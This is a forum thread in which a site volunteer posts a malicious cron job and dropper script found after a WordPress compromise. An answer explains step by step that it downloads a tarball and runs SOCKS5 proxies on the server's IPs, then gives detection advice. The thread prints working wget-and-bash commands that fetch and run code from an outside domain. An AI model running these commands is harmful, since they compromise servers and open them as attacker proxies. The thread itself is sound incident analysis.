Some of the malware appearing on our site is associated with a recent Wordpress attack
Apparently the site I volunteer for was one of several thousand sites targeting a recent hack that exploited some vulnerability in wordpress. The result of the violation was a cron job added to the site:
0 */48 * * * cd /tmp;wget clintonandersonperformancehorses.com/test/test;bash test;cd /tmp;rm -rf test
the file it was pulling is this (obviously, don't try this ...)
killall -9 perl
cd /tmp
wget clintonandersonperformancehorses.com/test/stest.tar
tar -vxf stest.tar
rm -rf stest.tar
cd stest
sh getip >>bug.txt
/sbin/ifconfig |grep "inet addr" |grep -v 127.0.0 |grep -v \:.192\. |awk -F ':' '{print $2}' |awk -F ' ' '{print $1}' >>bug.txt
cat bug.txt |sort |uniq >clean.txt
rm -rf bug.txt
bash mbind clean.txt
bash binded.txt
cd ..
rm -rf stest
I was hoping someone would tell me what he is doing? I've cleared the cron job and will follow any other advice I could get to secure the site again, but I'm worried that additional damage might be done that isn't as obvious. I just can't figure out what this file was actually doing.
source to share
I just can't figure out what this file was actually doing.
Short description
In the end, it kills all perl processes and then starts SOCKS5 servers on all external IP addresses of the machine.
In depth
Let's take a closer look at the script in turn:
killall -9 perl
This kills all processes perl
.
cd /tmp
wget clintonandersonperformancehorses.com/test/stest.tar
tar -vxf stest.tar
rm -rf stest.tar
cd stest
The above downloads the file stest.tar
and unpacks it into a directory /tmp/stest
, deletes the file tar
and moves to the directory where the downloaded files are now.
sh getip >>bug.txt
getip
The script, part stest.tar
, uses icanhazip.com
to find your public IP address and stores it in a file bug.txt
.
/sbin/ifconfig |grep "inet addr" |grep -v 127.0.0 |grep -v \:.192\. |awk -F ':' '{print $2}' |awk -F ' ' '{print $1}' >>bug.txt
cat bug.txt |sort |uniq >clean.txt
rm -rf bug.txt
The above example is used ifconfig
to check for any other non-local IP addresses your computer is responding to and adds them to bug.txt
. Duplicates are removed and the final list of your public IP addresses is saved in a file clean.txt
.
bash mbind clean.txt
This is the meat of the script. mbind
which was the part stest.tar
runs the script inst
on every IP in clean.txt
. For this IP address inst
, which is also included in stest.tar
, chooses a port at random and runs a copy of "Simple SOCKS5 Server for Perl" on this IP address and this port.
Specifically, the SOCKS server that runs is version 1.4 of the Simple Socks Server for Perl, which can be loaded from the original release. The version used here differs from sourceforge only in minor respects: the help message is suppressed, the md5 option is removed, and the IP and port are included in the script rather than passed on the command line. I suspect the purpose of the latest change is that the command line script looks relatively harmless when viewed with a utility like ps
.
bash binded.txt
the script binded.txt
was created inst
. It appears to be doing validation against the SOCKS5 server.
cd ..
rm -rf stest
The last part just cleans up. It removes all unloaded files and temporary files generated by scripts.
How to determine if another SOCKS server is running
The script inst
(part of the .tar file) starts each SOCKS server with the command:
/usr/bin/perl httpd
To see if everything works, view the output ps wax
and see if you see this command. If you do, use the command kill
to stop it.
source to share